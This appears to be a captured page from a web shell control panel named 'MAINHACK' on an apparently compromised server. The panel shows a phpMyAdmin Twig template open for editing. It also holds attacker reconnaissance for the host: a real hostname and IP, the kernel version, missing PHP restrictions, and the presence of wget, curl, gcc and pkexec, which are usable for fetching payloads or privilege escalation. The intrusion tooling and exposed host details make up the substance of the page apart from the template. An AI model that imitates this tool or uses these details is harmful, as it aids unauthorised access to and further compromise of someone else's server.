[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: user_groups.twig
<div class="row"><h2>{% trans 'User groups' %}</h2></div> {% if has_rows %} <form name="userGroupsForm" id="userGroupsForm" action="{{ action|raw }}" method="post"> {{ hidden_inputs|raw }} <table class="table table-striped table-hover"> <thead> <tr class="text-nowrap"> <th scope="col"> {% trans 'User groups' %} </th> <th scope="col"> {% trans 'Server level tabs' %} </th> <th scope="col"> {% trans 'Database level tabs' %} </th> <th scope="col"> {% trans 'Table level tabs' %} </th> <th scope="col"> {% trans 'Action' %} </th> </tr> </thead> <tbody> {% for groupName in user_groups_values %} <tr> <td>{{ groupName.name }}</td> <td>{{ groupName.serverTab }}</td> <td>{{ groupName.dbTab }}</td> <td>{{ groupName.tableTab }}</td> <td class="text-nowrap"> <a class="" href="{{ groupName.userGroupUrl|raw }}" data-post="{{ groupName.viewUsersUrl|raw }}">{{ groupName.viewUsersIcon|raw }}</a> <a class="" href="{{ groupName.userGroupUrl|raw }}" data-post="{{ groupName.editUsersUrl|raw }}">{{ groupName.editUsersIcon|raw }}</a> <button type="button" class="btn btn-link" data-bs-toggle="modal" data-bs-target="#deleteUserGroupModal" data-user-group="{{ groupName.name }}"> {{ get_icon('b_drop', 'Delete'|trans) }} </button> </td> </tr> {% endfor %} </tbody> </table> </form> <div class="modal fade" id="deleteUserGroupModal" tabindex="-1" aria-labelledby="deleteUserGroupModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteUserGroupModalLabel">{% trans 'Delete user group' %}</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="{% trans 'Close' %}"></button> </div> <div class="modal-body"></div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">{% trans 'Close' %}</button> <button type="button" class="btn btn-danger" id="deleteUserGroupConfirm">{% trans 'Delete' %}</button> </div> </div> </div> </div> {% endif %} <div class="row"> <fieldset class="pma-fieldset" id="fieldset_add_user_group"> <a href="{{ add_user_url|raw }}">{{ add_user_icon|raw }}{% trans 'Add user group' %}</a> </fieldset> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.8 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002